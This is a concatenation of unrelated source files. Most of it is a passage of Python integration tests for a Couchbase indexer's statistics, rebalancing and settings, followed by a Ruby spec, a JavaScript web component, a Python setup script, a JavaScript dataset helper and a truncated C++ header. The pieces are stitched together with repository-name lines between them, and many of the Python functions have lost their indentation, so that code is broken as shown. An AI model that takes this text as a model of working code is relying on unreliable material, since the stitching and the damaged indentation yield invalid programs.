common_distr = "{u'(0-64)': 1944, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
expected_distr2.append("{u'(0-64)': 1872, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 72}")
expected_distr2.append(common_distr)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_key_size(index_map, 'default', expected_distr2)
def test_arrkey_size_distribution(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
doc = {"indexer.statsPersistenceInterval": 60}
rest.set_index_settings_internal(doc)
string_70 = "x" * 70
string_260 = "x" * 260
string_1030 = "x" * 1030
string_5000 = "x" * 5000
string_103000 = "x" * 103000
insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : ["%s","",null] })' % string_70
insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : ["%s"] })' % string_260
insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : ["%s"] })' % string_1030
insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : ["%s","string1"] })' % string_5000
insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : ["%s", "string2"] })' % string_103000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=insert_query5,
server=self.n1ql_node)
insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : ["%s"] })' % string_5000
self.n1ql_helper.run_cbq_query(query=insert_query1,
server=self.n1ql_node)
create_index_query1 = "CREATE INDEX idx ON default(distinct name) USING GSI"
create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI"
create_index_query3 = "CREATE INDEX idx ON standard_bucket0(distinct name) USING GSI"
create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
expected_distr = "{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}"
expected_distr2 = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}"
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_arrkey_size(index_map, 'default', expected_distr)
self.verify_arrkey_size(index_map, 'standard_bucket0', expected_distr2)
self.sleep(60)
shell = RemoteMachineShellConnection(index_node)
output1, error1 = shell.execute_command("killall -9 indexer")
self.sleep(30)
index_map = self.get_index_stats()
self.log.info(index_map)
self.verify_arrkey_size(index_map, 'default', expected_distr)
self.verify_arrkey_size(index_map, 'standard_bucket0', expected_distr2)
    def test_keysize_rebalance_out(self):
        """Key-size distribution stats must survive rebalancing out the
        node hosting the default-bucket indexes.

        idx/idx2 on `default` are pinned to servers[1], which is then
        rebalanced out; the histograms are re-verified afterwards.
        """
        rest = RestConnection(self.master)
        # Pin the default-bucket indexes to servers[1] (the node that
        # will be rebalanced out below).
        create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI WITH {'nodes': ['%s:%s']}" % (self.servers[1].ip, self.servers[1].port)
        create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI WITH {'nodes': ['%s:%s']}" % (self.servers[1].ip, self.servers[1].port)
        create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
        create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
        self.n1ql_helper.run_cbq_query(query=create_index_query1,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=create_index_query2,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=create_index_query3,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=create_index_query4,
                                       server=self.n1ql_node)
        # One doc per size bucket of the key_size_distribution histogram.
        string_70 = "x" * 70
        string_260 = "x" * 260
        string_1030 = "x" * 1030
        string_5000 = "x" * 5000
        string_103000 = "x" * 103000
        insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
        insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
        insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
        insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query2,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query3,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query4,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query5,
                                       server=self.n1ql_node)
        insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        expected_distr = []
        expected_distr2 = []
        common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
        expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
        expected_distr.append(common_distr)
        expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
        expected_distr2.append(common_distr)
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
        # remove the n1ql node which is being rebalanced out
        # rebalance out a node
        rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [self.servers[1]])
        reached = RestHelper(rest).rebalance_reached()
        self.assertTrue(reached, "rebalance failed, stuck or did not complete")
        rebalance.result()
        self.sleep(30)
        # The histograms must be unchanged after the indexes were moved
        # off the rebalanced-out node.
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
    def test_keysize_rebalance_in(self):
        """Key-size distribution stats must be correct on a node that is
        rebalanced into the cluster.

        Two variants driven by self.move_index:
          * move_index=True:  idx is created before the rebalance, then
            moved to the new node via ALTER INDEX ... "move".
          * move_index=False: idx is created only after the new index
            node has been rebalanced in.
        """
        rest = RestConnection(self.master)
        if self.move_index:
            create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
            self.n1ql_helper.run_cbq_query(query=create_index_query1,
                                           server=self.n1ql_node)
        create_index_query2 = "CREATE INDEX idx2 ON default(join_mo) USING GSI "
        create_index_query3 = "CREATE INDEX idx ON standard_bucket0(name) USING GSI"
        create_index_query4 = "CREATE INDEX idx2 ON standard_bucket0(join_mo) USING GSI"
        self.n1ql_helper.run_cbq_query(query=create_index_query2,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=create_index_query3,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=create_index_query4,
                                       server=self.n1ql_node)
        # One doc per size bucket of the key_size_distribution histogram.
        string_70 = "x" * 70
        string_260 = "x" * 260
        string_1030 = "x" * 1030
        string_5000 = "x" * 5000
        string_103000 = "x" * 103000
        insert_query1 = 'INSERT INTO default (KEY, VALUE) VALUES ("id1", { "name" : "%s" })' % string_70
        insert_query2 = 'INSERT INTO default (KEY, VALUE) VALUES ("id2", { "name" : "%s" })' % string_260
        insert_query3 = 'INSERT INTO default (KEY, VALUE) VALUES ("id3", { "name" : "%s" })' % string_1030
        insert_query4 = 'INSERT INTO default (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        insert_query5 = 'INSERT INTO default (KEY, VALUE) VALUES ("id5", { "name" : "%s" })' % string_103000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query2,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query3,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query4,
                                       server=self.n1ql_node)
        self.n1ql_helper.run_cbq_query(query=insert_query5,
                                       server=self.n1ql_node)
        insert_query1 = 'INSERT INTO standard_bucket0 (KEY, VALUE) VALUES ("id4", { "name" : "%s" })' % string_5000
        self.n1ql_helper.run_cbq_query(query=insert_query1,
                                       server=self.n1ql_node)
        expected_distr = []
        expected_distr2 = []
        common_distr = "{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 0, u'(1025-4096)': 0, u'(102401-max)': 0}"
        expected_distr.append("{u'(0-64)': 2016, u'(257-1024)': 1, u'(65-256)': 1, u'(4097-102400)': 1, u'(1025-4096)': 1, u'(102401-max)': 1}")
        expected_distr.append(common_distr)
        expected_distr2.append("{u'(0-64)': 2016, u'(257-1024)': 0, u'(65-256)': 0, u'(4097-102400)': 1, u'(1025-4096)': 0, u'(102401-max)': 0}")
        expected_distr2.append(common_distr)
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
        # Rebalance in a fresh index node.
        services_in = ["index"]
        rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
                                                 services=services_in)
        reached = RestHelper(rest).rebalance_reached()
        self.assertTrue(reached, "rebalance failed, stuck or did not complete")
        rebalance.result()
        self.sleep(30)
        if not self.move_index:
            create_index_query1 = "CREATE INDEX idx ON default(name) USING GSI"
            self.n1ql_helper.run_cbq_query(query=create_index_query1, server=self.n1ql_node)
        else:
            # Relocate the pre-existing idx onto the newly added node.
            alter_index_query = 'ALTER INDEX default.idx WITH {{"action":"move","nodes": ["{0}:{1}"]}}'.format(self.servers[self.nodes_init].ip, self.servers[self.nodes_init].port)
            self.n1ql_helper.run_cbq_query(query=alter_index_query, server=self.n1ql_node)
        self.sleep(20)
        index_map = self.get_index_stats()
        self.log.info(index_map)
        self.verify_key_size(index_map, 'default', expected_distr)
        self.verify_key_size(index_map, 'standard_bucket0', expected_distr2)
def verify_key_size(self, index_map, bucket, expected_distr):
for index in index_map[bucket]:
if index == 'idx':
self.log.info(index_map[bucket][index]['key_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['key_size_distribution']) == expected_distr[0])
else:
self.log.info(index_map[bucket][index]['key_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['key_size_distribution']) == expected_distr[1])
def verify_arrkey_size(self, index_map, bucket, expected_distr):
for index in index_map[bucket]:
if index == 'idx':
self.log.info(index_map[bucket][index]['arrkey_size_distribution'])
self.assertTrue(str(index_map[bucket][index]['arrkey_size_distribution']) == expected_distr)
else:
self.assertTrue("arrkey_size_distribution" not in str(index_map[bucket][index]))
def test_num_scan_timeouts(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
shell = RemoteMachineShellConnection(self.master)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
shell.execute_cbworkloadgen(rest.username, rest.password, 1000000, 70, 'default', 1024, '-j')
doc = {"indexer.settings.scan_timeout": 10}
rest.set_index_settings(doc)
query_params = {'scan_consistency': 'request_plus'}
select_query = "SELECT age from default"
self.n1ql_helper.run_cbq_query(query=select_query, server=self.n1ql_node, query_params=query_params)
index_map = self.get_index_stats()
official_stats = rest.get_index_official_stats()
self.log.info(index_map)
self.log.info(official_stats)
    def test_avg_scan_latency(self):
        """avg_scan_latency must agree between the internal stats map and
        the official stats REST endpoint after a burst of scans."""
        index_node = self.get_nodes_from_services_map(service_type="index",
                                                      get_all_nodes=False)
        rest = RestConnection(index_node)
        create_index_query = "CREATE INDEX idx ON default(name) USING GSI"
        try:
            self.n1ql_helper.run_cbq_query(query=create_index_query,
                                           server=self.n1ql_node)
        except Exception as ex:
            self.log.info(str(ex))
            # Only errors other than self.expected_err_msg are fatal.
            if self.expected_err_msg not in str(ex):
                self.fail(
                    "index creation did not fail with expected error : {0}".format(
                        str(ex)))
            else:
                self.log.info("Index creation failed as expected")
        select_query = "SELECT count(name) from default"
        # Run select query 10 times
        for i in range(0, 10):
            self.n1ql_helper.run_cbq_query(query=select_query,
                                           server=self.n1ql_node)
        index_map = self.get_index_stats()
        official_stats = rest.get_index_official_stats()
        self.log.info(index_map)
        self.log.info(official_stats)
        self.assertTrue(index_map['default']['idx']['avg_scan_latency'] == official_stats['default:idx']['avg_scan_latency'])
def test_initial_build_progress(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
create_index_query = "CREATE INDEX idx ON default(name) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
init_time = time.time()
check = False
next_time = init_time
while not check:
index_status = rest.get_index_official_stats()
self.log.info(index_status)
if index_status['default:idx']['initial_build_progress'] == 100:
check = True
else:
check = False
time.sleep(1)
next_time = time.time()
check = check or (next_time - init_time > 60)
official_stats = rest.get_index_official_stats()
self.log.info(official_stats)
self.assertTrue(official_stats['default:idx']['initial_build_progress'] == 100)
def test_num_items_flushed(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
official_stats = rest.get_index_official_stats()
self.log.info(official_stats)
self.assertTrue(official_stats['default:idx']['num_items_flushed'] == self.docs_per_day*2016)
def test_avg_drain_rate(self):
index_node = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=False)
rest = RestConnection(index_node)
shell = RemoteMachineShellConnection(self.master)
create_index_query = "CREATE INDEX idx ON default(age) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation did not fail with expected error : {0}".format(
str(ex)))
shell.execute_cbworkloadgen(rest.username, rest.password, <PASSWORD>, 70, 'default', 1024, '-j')
official_stats = rest.get_index_official_stats()
index_map = self.get_index_stats()
self.log.info(index_map)
self.log.info(official_stats)
self.assertTrue(index_map['default']['idx']['avg_drain_rate'] == official_stats['default:idx']['avg_drain_rate'])
    def test_index_stats(self):
        """
        Tests index stats when indexes are created and dropped
        """
        #Create Index
        self.run_multi_operations(buckets = self.buckets,
            query_definitions = self.query_definitions,
            create_index = True, drop_index = False)
        #Check Index Stats
        self.sleep(30)
        index_map = self.get_index_stats()
        self.log.info(index_map)
        for query_definition in self.query_definitions:
            index_name = query_definition.index_name
            for bucket in self.buckets:
                bucket_name = bucket.name
                # Only these keys are compared by exact value; the rest
                # are checked for presence only (see _verify_index_stats).
                check_keys = ['items_count', 'total_scan_duration', 'num_docs_queued',
                              'num_requests', 'num_rows_returned', 'num_docs_queued',
                              'num_docs_pending', 'delete_bytes' ]
                # 2016 items expected per index — presumably the setUp
                # data generator's corpus size; confirm against it.
                map = self._create_stats_map(items_count=2016)
                self._verify_index_stats(index_map, index_name, bucket_name, map, check_keys)
    def test_index_storage_stats(self):
        """Storage stats: every index's MainStore must report a resident
        ratio of exactly 1.0 (fully memory-resident)."""
        indexer_nodes = self.get_nodes_from_services_map(service_type="index",
                                                         get_all_nodes=True)
        self.run_multi_operations(buckets = self.buckets,
            query_definitions = self.query_definitions,
            create_index = True, drop_index = False)
        for node in indexer_nodes:
            indexer_rest = RestConnection(node)
            content = indexer_rest.get_index_storage_stats()
            # content maps bucket -> {index -> {MainStore/BackStore stats}}.
            for index in list(content.values()):
                for stats in list(index.values()):
                    self.log.info("MainStore Stats - {0}: {1}".format(
                        index, stats["MainStore"]))
                    self.log.info("BackStore Stats - {0}: {1}".format(
                        index, stats["BackStore"]))
                    self.assertEqual(stats["MainStore"]["resident_ratio"], 1.00,
                                     "Resident ratio not 1")
    def test_indexer_logs_for_leaked_password(self):
        """Grep indexer.log on every index node for the cbauth-masked URL
        form and assert it appears at least once.

        NOTE(review): the assertion passes when the masked URL IS found,
        yet the failure message reads "Password leak found" — the message
        looks inverted relative to the check; confirm intent.
        """
        expected_msg = "http://%40index-cbauth@127.0.0.1:8091"
        indexers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
        self.assertGreater(len(indexers), 0, "No indexer found in cluster")
        for server in indexers:
            shell = RemoteMachineShellConnection(server)
            # Resolve the node's log directory via ns_server diag/eval.
            _, dir = RestConnection(server).diag_eval('filename:absname('
                                                      'element(2, '
                                                      'application:get_env('
                                                      'ns_server, error_logger_mf_dir))).')
            indexer_log = str(dir) + '/indexer.log*'
            count, err = shell.execute_command("zgrep \"{0}\" {1} | wc -l".
                                               format(expected_msg, indexer_log))
            # execute_command may return the output as a list of lines.
            if isinstance(count, list):
                count = int(count[0])
            else:
                count = int(count)
            shell.disconnect()
            self.assertGreater(count, 0, "Password leak found in Indexer {0}".format(server.ip))
def test_get_index_settings(self):
#Check Index Settings
map = self.get_index_settings()
for node in list(map.keys()):
val = map[node]
gen = self._create_settings_map()
for key in list(gen.keys()):
self.assertTrue(key in list(val.keys()), "{0} not in {1} ".format(key, val))
def test_set_index_settings(self):
#Check Index Settings
map1 = self._set_settings_map()
self.log.info(map1)
self.set_index_settings(map1)
map = self.get_index_settings()
for node in list(map.keys()):
val = map[node]
for key in list(map1.keys()):
self.assertTrue(key in list(val.keys()), "{0} not in {1} ".format(key, val))
    def _verify_index_stats(self, index_map, index_name, bucket_name, index_stat_values, check_keys=None):
        """Verify expected stat values for one index on one bucket.

        Every key in index_stat_values must be present in the index's
        stats. Value comparison depends on check_keys:
          * check_keys is None  -> every key's value is compared.
          * check_keys given    -> only keys listed in check_keys are
            compared by value; others are checked for presence only.
        """
        self.assertIn(bucket_name, list(index_map.keys()), "bucket name {0} not present in stats".format(bucket_name))
        self.assertIn(index_name, list(index_map[bucket_name].keys()),
                      "index name {0} not present in set of indexes {1}".format(index_name,
                                                                                list(index_map[bucket_name].keys())))
        for key in list(index_stat_values.keys()):
            self.assertIn(key, list(index_map[bucket_name][index_name].keys()),
                          "stats {0} not present in Index stats {1}".format(key,
                                                                            index_map[bucket_name][index_name]))
            if check_keys:
                # Filtered mode: only compare values for the listed keys.
                if key in check_keys:
                    self.assertEqual(str(index_map[bucket_name][index_name][key]), str(index_stat_values[key]),
                                     " for key {0} : {1} != {2}".format(key,
                                                                        index_map[bucket_name][index_name][key],
                                                                        index_stat_values[key]))
            else:
                # Unfiltered mode: compare every expected value.
                self.assertEqual(str(index_stat_values[key]), str(index_map[bucket_name][index_name][key]),
                                 " for key {0} : {1} != {2}".format(key,
                                                                    index_map[bucket_name][index_name][key],
                                                                    index_stat_values[key]))
def set_index_settings(self, settings):
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
for server in servers:
RestConnection(server).set_index_settings(settings)
def get_index_settings(self):
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
index_settings_map = {}
for server in servers:
key = "{0}:{1}".format(server.ip, server.port)
index_settings_map[key] = RestConnection(server).get_index_settings()
return index_settings_map
def _create_stats_map(self, items_count = 0, total_scan_duration = 0,
delete_bytes = 0, scan_wait_duration = 0, insert_bytes = 0,
num_rows_returned = 0, num_docs_indexed = 0, num_docs_pending = 0,
scan_bytes_read = 0, get_bytes = 0, num_docs_queued = 0,num_requests = 0,
disk_size = 0):
map = {}
map['items_count'] = items_count
map['disk_size'] = disk_size
map['items_count'] = items_count
map['total_scan_duration'] = total_scan_duration
map['delete_bytes'] = delete_bytes
map['scan_wait_duration'] = scan_wait_duration
map['insert_bytes'] = insert_bytes
map['num_rows_returned'] = num_rows_returned
map['num_docs_indexed'] = num_docs_indexed
map['num_docs_pending'] = num_docs_pending
map['scan_bytes_read'] = scan_bytes_read
map['get_bytes'] = get_bytes
map['num_docs_queued'] = num_docs_queued
map['num_requests'] = num_requests
return map
def _create_settings_map(self):
map = { "indexer.settings.recovery.max_rollbacks" : 5,
"indexer.settings.bufferPoolBlockSize" : 16384,
"indexer.settings.max_cpu_percent" : 400,
"queryport.client.settings.poolOverflow" : 30,
"indexer.settings.memProfile" : False,
"indexer.settings.statsLogDumpInterval" : 60,
"indexer.settings.persisted_snapshot.interval" : 5000,
"indexer.settings.inmemory_snapshot.interval" : 200,
"indexer.settings.compaction.check_period" : 30,
"indexer.settings.largeSnapshotThreshold" : 200,
"indexer.settings.log_level" : "debug",
"indexer.settings.scan_timeout" : 120000,
"indexer.settings.maxVbQueueLength" : 0,
"indexer.settings.send_buffer_size" : 1024,
"indexer.settings.compaction.min_size" : 1048576,
"indexer.settings.cpuProfDir" : "",
"indexer.settings.memory_quota" : 268435456,
"indexer.settings.memProfDir" : "",
"projector.settings.log_level" : "debug",
"queryport.client.settings.poolSize" : 1000,
"indexer.settings.max_writer_lock_prob" : 20,
"indexer.settings.compaction.interval" : "00:00,00:00",
"indexer.settings.cpuProfile" : False,
"indexer.settings.compaction.min_frag" : 30,
"indexer.settings.sliceBufSize" : 50000,
"indexer.settings.wal_size" : 4096,
"indexer.settings.fast_flush_mode" : True,
"indexer.settings.smallSnapshotThreshold" : 30,
"indexer.settings.persisted_snapshot_init_build.interval": 5000
}
return map
def _set_settings_map(self):
map = { "indexer.settings.recovery.max_rollbacks" : 4,
"indexer.settings.bufferPoolBlockSize" : 16384,
"indexer.settings.max_cpu_percent" : 400,
"indexer.settings.memProfile" : False,
"indexer.settings.statsLogDumpInterval" : 60,
"indexer.settings.persisted_snapshot.interval" : 5000,
"indexer.settings.inmemory_snapshot.interval" : 200,
"indexer.settings.compaction.check_period" : 31,
"indexer.settings.largeSnapshotThreshold" : 200,
"indexer.settings.log_level" : "debug",
"indexer.settings.scan_timeout" : 120000,
"indexer.settings.maxVbQueueLength" : 0,
"indexer.settings.send_buffer_size" : 1024,
"indexer.settings.compaction.min_size" : 1048576,
"indexer.settings.cpuProfDir" : "",
"indexer.settings.memory_quota" : 268435456,
"indexer.settings.memProfDir" : "",
"indexer.settings.persisted_snapshot_init_build.interval": 5000,
"indexer.settings.max_writer_lock_prob" : 20,
"indexer.settings.compaction.interval" : "00:00,00:00",
"indexer.settings.cpuProfile" : False,
"indexer.settings.compaction.min_frag" : 31,
"indexer.settings.sliceBufSize" : 50000,
"indexer.settings.wal_size" : 4096,
"indexer.settings.fast_flush_mode" : True,
"indexer.settings.smallSnapshotThreshold" : 30,
"projector.settings.log_level" : "debug",
"queryport.client.settings.poolSize" : 1000,
"queryport.client.settings.poolOverflow" : 30
}
return map
|
jmarianer/scorm_engine
|
spec/scorm_engine/faraday/connection_spec.rb
|
<reponame>jmarianer/scorm_engine
# Specs for the Faraday connection wrapper: verifies that #base_uri is
# derived correctly from the ScormEngine configuration.
RSpec.describe ScormEngine::Faraday::Connection do
  before do
    # Configure the client globally for each example with dummy credentials.
    ScormEngine.configure do |config|
      config.host = "scorm.engine"
      config.username = "admin"
      config.password = "<PASSWORD>"
    end
  end

  describe "#base_uri" do
    # scorm_engine_client is presumably a spec helper building a client
    # from the configuration above — confirm in spec_helper.
    let(:uri) { scorm_engine_client.base_uri }

    it "returns a URI::HTTPS instance" do
      expect(uri).to be_a(URI::HTTPS)
    end

    it "is correct given the configuration" do
      expect(uri.to_s).to eq "https://scorm.engine/ScormEngineInterface/api/v1/"
    end
  end
end
|
easylogic/editor
|
src/editor-layouts/designeditor/web-component/MyElement.js
|
import createEmotion from '@emotion/css/create-instance';
import UIElement from 'el/sapa/UIElement';
import WebComponent from 'el/sapa/WebComponent';
import SecondElement from './SecondElement';
import { uuidShort } from 'el/utils/math';
/**
 * Demo custom element built on the el/sapa UIElement base class,
 * registered below as <my-element> via the WebComponent bridge.
 */
export default class MyElement extends UIElement {
  /** Observed attributes mirrored into this.props. */
  static get attributes () {
    return ['key', 'value', 'class', 'style']
  }

  /** Raw CSS compiled per-instance into a scoped class in afterRender. */
  static get style() {
    return `
      background-color: blue;

      .my-element {
        background-color: red;
      }
    `
  }

  afterRender() {
    // Lazily create a per-instance emotion stylesheet so the static CSS
    // is scoped to this element only. Done once per instance.
    if (!this.__localStyle) {
      const { css } = createEmotion({
        // emotion keys must not contain digits; strip them from the uuid.
        key: uuidShort().replace(/[0-9]/g, ''),
        container: this.$el.el
      })

      this.__localStyle = css(MyElement.style)
      this.$el.addClass(this.__localStyle);
    }
  }

  components() {
    return {
      SecondElement
    }
  }

  template() {
    const {key, value} = this.props;
    return `
      <div>나만의 element {key=${key}, value=${value}}}
        <div class="my-element">red</div>
        <object refClass="SecondElement" />
      </div>`
  }
}

// Register the element; WebComponent adapts the sapa class to the
// custom-elements API.
customElements.define('my-element', WebComponent(MyElement))
|
acoburn/pod-browser
|
src/models/dataset/index.js
|
<reponame>acoburn/pod-browser
/**
* Copyright 2020 Inrupt Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal in
* the Software without restriction, including without limitation the rights to use,
* copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
* Software, and to permit persons to whom the Software is furnished to do so,
* subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
* INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
* HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
* OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
import {
createSolidDataset,
getSolidDataset,
saveSolidDatasetAt,
} from "@inrupt/solid-client";
import { ERROR_CODES, isHTTPError } from "../../error";
import { chain } from "../../solidClientHelpers/utils";
/*
* Datasets refer to SolidDataset from @inrupt/solid-client.
* This module adds some extra custom, handy functions.
*/
/* Model functions */
/**
 * Fetch the SolidDataset at `url`, or hand back a brand-new empty dataset
 * when the resource does not exist yet. Any error other than 404 is rethrown.
 */
export async function getOrCreateDataset(url, fetch) {
  try {
    const dataset = await getSolidDataset(url, { fetch });
    return dataset;
  } catch (error) {
    // 404 simply means "not created yet" — start from an empty dataset.
    if (!isHTTPError(error, ERROR_CODES.NOT_FOUND)) throw error;
    return createSolidDataset();
  }
}
/**
 * Load (or create) the dataset at `url`, thread it through the given
 * transformation functions, and persist the result back to the same URL.
 */
export async function updateOrCreateDataset(url, fetch, ...operations) {
  const existing = await getOrCreateDataset(url, fetch);
  const transformed = chain(existing, ...operations);
  return saveSolidDatasetAt(url, transformed, { fetch });
}
|
cyril-s/aptly-ctl
|
setup.py
|
<filename>setup.py
#!/usr/bin/env python3
"""setuptools packaging script for aptly-ctl."""
from setuptools import setup, find_packages
from aptly_ctl import __version__
from os import path

# The README doubles as the long description shown on PyPI.
_here = path.abspath(path.dirname(__file__))
with open(path.join(_here, 'README.md'), encoding='utf-8') as readme_file:
    readme_text = readme_file.read()

setup(
    name="aptly-ctl",
    version=__version__,
    packages=find_packages(exclude=["tests"]),
    license="MIT",
    author="<NAME>",
    author_email="<EMAIL>",
    description="Convenient command line Aptly API client",
    long_description=readme_text,
    long_description_content_type="text/markdown",
    url="https://github.com/cyril-s/aptly-ctl",
    install_requires=["aptly-api-client <=0.2.1", "PyYAML", "requests", "fnvhash"],
    python_requires=">=3",
    entry_points={
        "console_scripts":
            ["aptly-ctl = aptly_ctl.application:main"]
    },
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Programming Language :: Python :: 3 :: Only",
        "Environment :: Console",
        "License :: OSI Approved :: MIT License",
    ]
)
|
rekhadpr/demoazure1
|
lib/wabt/src/stream.cc
|
<reponame>rekhadpr/demoazure1
/*
* Copyright 2016 WebAssembly Community Group participants
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
